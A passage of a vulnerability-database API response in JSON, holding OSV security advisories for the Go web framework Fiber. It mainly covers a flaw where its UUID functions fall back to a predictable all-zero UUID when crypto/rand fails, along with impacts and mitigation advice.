**Security Testing**: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.\n\n## Defence-in-depth\n\nUsers should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Secure, and the Secure and HttpOnly attributes.","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-94w9-97p3-p368","labels":["CVE-2023-45128","GO-2023-2115"],"created_at":"2026-04-26 03:01:59.024580+00:00","updated_at":"2026-04-26 03:01:59.024580+00:00"},{"id":5226,"ecosystem":"go","package_name":"github.com/gofiber/fiber/v2","affected_version":null,"fixed_version":"2.52.11","bug_id":"osv:GHSA-68rr-p4fp-j59v","title":"Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure","description":"Fiber v2 contains an internal vendored copy of `gofiber/utils`, and its functions `UUIDv4()` and `UUID()` inherit the same critical weakness described in the upstream advisory. On **Go versions prior to 1.24**, the underlying `crypto/rand` implementation **can return an error** if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID `00000000-0000-0000-0000-000000000000`.\n\nOn Go **1.24+**, the language guarantees that `crypto/rand` no longer returns an error (it will block or panic instead), so this vulnerability primarily affects **Fiber v2 users running Go 1.23 or earlier**, which Fiber v2 officially supports.\n\nBecause no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on *predictable, repeated, or low-entropy identifiers* in security-critical pathways. 
This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) **default to using `utils.UUIDv4()`**.\n\nImpact includes, but is not limited to:\n\n* **Session fixation or hijacking** (predictable session IDs)\n* **CSRF token forgery** or bypass\n* **Authentication replay / token prediction**\n* **Potential denial-of-service (DoS):** if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption\n* **Request-ID collisions**, undermining logging and trace integrity\n* **General compromise** of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy\n\nAll Fiber v2 versions containing the internal `utils.UUIDv4()` / `utils.UUID()` implementation are affected when running on **Go <1.24**. **No patched Fiber v2 release currently exists.**\n\n---\n\n## Suggested Mitigations / Workarounds\n\nUpdate to the latest version of Fiber v2.\n\n---\n\n### Likelihood / Environmental Factors\n\nIt’s important to note that **entropy exhaustion on modern Linux systems is extremely rare**, as the kernel’s CSPRNG is resilient and non-blocking. However, **entropy-source failures** — where `crypto/rand` cannot read from its underlying provider — are significantly more likely in certain environments.\n\nThis includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to `/dev/urandom` or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On **Go <1.24**, such failures cause `crypto/rand` to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. 
This silent fallback is the root cause of the vulnerability.\n\n---\n\n## References\n\n* Upstream advisory for `gofiber/utils`: **GHSA-m98w-cqp3-qcqr**\n* Source repositories:\n\n  * `github.com/gofiber/fiber`\n  * `github.com/gofiber/utils`\n\n---\n\n## Credits / Reporter\n\nReported by **@sixcolors** (Fiber Maintainer / Security Team)","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-68rr-p4fp-j59v","labels":["CVE-2025-66630","GO-2026-4471"],"created_at":"2026-04-26 03:01:59.019245+00:00","updated_at":"2026-04-26 03:01:59.019245+00:00"}],"total":19,"_cache":"hit"}